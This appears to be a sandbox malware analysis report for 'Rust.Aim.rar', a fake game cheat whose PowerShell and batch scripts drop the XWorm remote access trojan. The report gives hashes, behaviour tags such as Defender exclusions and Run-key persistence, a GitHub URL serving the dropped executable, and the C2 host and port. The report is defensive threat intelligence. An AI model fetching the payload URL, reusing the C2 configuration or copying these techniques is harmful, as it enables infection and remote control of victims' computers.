Overview

overview

10

Static

static

10

Rust.Aim/First.ps1

windows11-21h2-x64

10

Rust.Aim/Start.bat

windows11-21h2-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Rust.Aim.rar

  • Size

    911B

  • Sample

    241108-bzm34svldp

  • MD5

    0ce5ecd49596d10453ecb7dc612e5d3a

  • SHA1

    33c45a404a32d71a689f923873333c7cb3930c4b

  • SHA256

    5e83047d8407d37fbe2ad843c7844d0d6189adc107988b389ce1fa9f9c508748

  • SHA512

    cfa9d98d909c2924d904a74ff2c6d37c3496e3ca39bceb0efb11b69c041bb3c5763d4d530d6f2cb63621a5e140b7f13d6d38d0c4261aa09f26a5c63a4a3752b8

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/Mohmmmasdasd/asdas/raw/refs/heads/main/Windows.Security.exe

Extracted

Family

xworm

C2

here-thinking.gl.at.ply.gg:50161

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    WindowsSecurity.exe

Targets

    • Target

      Rust.Aim/First.ps1

    • Size

      1KB

    • MD5

      355758fa44771365dfe136f62ad45d7b

    • SHA1

      6201b4545c3593ab65d49d41609ac722166a6563

    • SHA256

      ec083e27ff17a38cba680f48e6468cbdadb4ee45561f58b8a941cc3452c9ac11

    • SHA512

      3cbecf52f2132398ae72e7ad074a6f4bb69dabc2666e07826b6b35f3853cdbb1881e8848e0fe46897496b50c9de81618865e5cdd1cb03a723ef24d9a888fd4d1

    Score
    10/10
    xwormexecutionpersistencerattrojan

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

      trojanratxworm

    • Xworm family

      xworm

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution

    • Deletes itself

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1

    • Target

      Rust.Aim/Start.bat

    • Size

      129B

    • MD5

      db38c6d364840c2f07293c6e126b4861

    • SHA1

      d373ea5202039fa1abde76abd7cf42757a68b431

    • SHA256

      af95ba5eb54db6ae3708b77d2f1f317fb0e723fc837ca800409554333060461e

    • SHA512

      9dcd53d90cf7a1bd9cea90ba5663734cda59266a7176421474f3f1cbdcfdba0b8a4230b14d16c68a550e88c91e5b82b9cce207025cb69eac3ebf369d4e24f6b8

    Score
    10/10
    xwormexecutionpersistencerattrojan

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

      trojanratxworm

    • Xworm family

      xworm

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

      execution

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    behavioral2

MITRE ATT&CK Enterprise v15

Tasks